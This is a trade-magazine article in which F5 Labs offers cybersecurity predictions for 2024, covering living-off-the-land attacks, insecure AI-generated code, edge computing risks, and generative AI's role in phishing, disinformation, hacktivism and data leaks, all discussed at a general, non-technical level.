F5 Labs describes fast changing cybersecurity dynamics in 2024

F5 Labs describes fast changing cybersecurity dynamics in 2024

David Warburton, Director F5 Labs

How times have changed! Looking back at our cybersecurity predictions for 2023 there was not a single mention of AI. And yet, here we are and it seems almost impossible to read a headline in which AI is not somehow involved.

With input from security operations engineers and threat intelligence analysts across F5, here is our take on what we are likely to see in the coming months.

N-dimension poverty matrix

The security poverty line is defined as the level of knowledge, authority, and most of all budgets necessary to accomplish the bare minimum of security controls. The cost and complexity of current security offerings will force organisations to choose between entire families of controls.

Today it seems that organisations need security orchestration, automation, and incident response, SOAR, security information and event management, SIEM, vulnerability management tools, and threat intelligence services, as well as programmes like configuration management, incident response, penetration testing, and governance, compliance, and risk.

The key issue here is that many enterprise organisations choose to consume these controls as managed services, such that the expertise is guaranteed but so is the cost. The heightened cost of entry into each of these niches means that they will increasingly become all-or-nothing, and more organisations will eventually need to choose between them.

In other words, the idea of a simple poverty line no longer captures the trade-off that exists between focused capability in one niche and covering all of the bases. Instead of a poverty line we will have a poverty matrix composed of n-dimensions, where n is the number of niches, and even well-resourced enterprises will struggle to put it all together.

Live off the land attacks

Growing complexity of IT environments, particularly in cloud and hybrid architectures, will make it more challenging to monitor and detect living-off-the-land, LOTL attacks. Attackers are increasingly turning to LOTL techniques that use legitimate management software already present on victim systems to achieve their malicious objectives.

To make things worse, LOTL attacks can be incorporated into supply chain attacks to compromise critical infrastructure and disrupt operations. Unless we improve visibility in our own networks, we can expect to see attackers use our own tools against us with increasing frequency.

Speed over security

Code assistants write code so quickly that developers may not have time to review. Depending on when the LLM was built, it may not even be aware of the latest vulnerabilities, making it impossible for the model to construct code that avoids these vulnerabilities or avoids importing libraries with vulnerabilities. In the age of generative AI, organisations that prioritise speed over security will inevitably introduce new vulnerabilities.

Many developers, seasoned and newbie alike, increasingly look to generative AI to write code or check for bugs. But without the correct safeguards in place, many foresee LLMs creating a deluge of vulnerable code which is difficult to secure. Whilst OSS poses a risk, its benefit lies in its inherent fix-once approach—should a vulnerability be discovered in an OSS library, it can be fixed once and then used by everyone who uses that library. With GenAI code generation, every developer will end up with a unique and bespoke piece of code.

Attacking the Edge

The rise of edge computing that will drive a dramatic expansion in attack surface. He notes that physical tampering, management challenges, and software and API vulnerabilities are all risks that are exacerbated in an edge context. Edge compute will emerge as an attack surface.

75% of enterprise data will be generated and processed outside the traditional confines of data centres or the cloud. This paradigm redefines organisational boundaries since workloads at the edge may harbour sensitive information and privileges.

Just as with MFA, attackers will focus on areas where their time has the biggest impact. If the shift to edge computing is handled as carelessly as cloud computing can be, expect to see a similar number of high-profile incidents over the coming year.

Generative AI will converse with targets

In April 2023 Bruce Schneier pointed out that the real bottleneck in phishing is not the initial click of the malicious link but the cash out, and that often takes a lot more interaction with the victim than we might assume.

Organised crime gangs will benefit from no longer needing to employ individuals whose entire job was to translate messages from victim and act as a support centre. Generative AI will be used to translate messages from the non-native language the attackers use, and respond with authentic sounding responses, coaching the victim along the social engineering path.

By incorporating publicly available personal information to create incredibly lifelike scams, organised cybercrime groups will take the phishing-as-a-service we already know and magnify it both in scale and efficiency.

Organised cybercrime will create entirely fake online personas. Generative AI will be used to create fake accounts containing posts and images that are indiscernible from real human content. All of the attack strategies that fake accounts engender, including fraud, credential stuffing, disinformation, and marketplace manipulation, will see an enormous boost in productivity when it costs zero effort to match human realism.

Generative AI for disinformation

The combination of fake content creation, automated text generation for disinformation, targeted misinformation campaigns, and circumvention of content moderation constitutes a leap forward for malicious influence. We have already observed genAI-created content being used on a small scale in current conflicts around the world.

Reports indicate AI generated images have been spread by state and non-state actors to garner support for their side. At a larger scale, expect to see this used by different actors ahead of major world events which in 2024 including the US Presidential election and the Olympics in Paris.

Concerns such as these led to Adobe, Microsoft, the BBC, and others creating the C2PA standard, a technique to cryptographically watermark the origin of digital media. Time will tell whether this will have any measurable impact with the general public.

Generative AI will drive hacktivism

Hacktivist activity related to major world events is expected to grow as computing power continues to become more affordable and, crucially, easier to use. Through the use of AI tools and the power of their smartphones and laptops, it is likely that more unsophisticated actors will join the fight in cyber space as hacktivists.

With world events like the Olympics, elections, and ongoing wars taking place in 2024, hacktivists are likely to use these opportunities to gain notoriety for their group and sympathy for the causes they support. Attendees, sponsors, and other loosely affiliated organisations are likely to become targets, if not victims of these geopolitically motivated hacktivists. This is likely to extend beyond just targeting individuals but also to targeting companies and organisations that support different causes.

Real-time inputs from Generative AI

The ability of generative AI to create digital content, be it a phishing email or fake profile, has been well understood for some time. Its use in attacks can therefore be considered passive. With their impressive ability to create code LLMs can, and will, be used to direct the sequences of procedures during live attacks, allowing attackers to react to defences as they encounter them.

By leveraging APIs from open genAI systems such as ChatGPT, or by building their own LLMs, attackers will be able to incorporate the knowledge and ideas of an AI system during a live attack on a website or network. Should an attacker’s website attack find itself blocked due to security controls, an AI system can be used to evaluate the response and suggest alternative ways to attack.

Leaky Large Language models

Fresh research has shown disturbingly simple ways in which LLMs can be tricked into revealing their training data, which often includes proprietary and personal data. The rush to create proprietary LLMs will result in many more examples of training data being exposed, if not through novel attacks, then by rushed and misconfigured security controls.

Expect to see spectacular failures of GenAI-driven tools—such as massive leaks of PII, novel techniques to gain unauthorised access, and denial of service attacks. As with cloud breaches, the impact of LLM leaks has the potential to be enormous because of the sheer quantity of data involved.

These predictions underscore the need for continuous adaptation and innovation in defending against evolving cyber threats.

Browse our latest issue

Intelligent Tech Channels

View Magazine Archive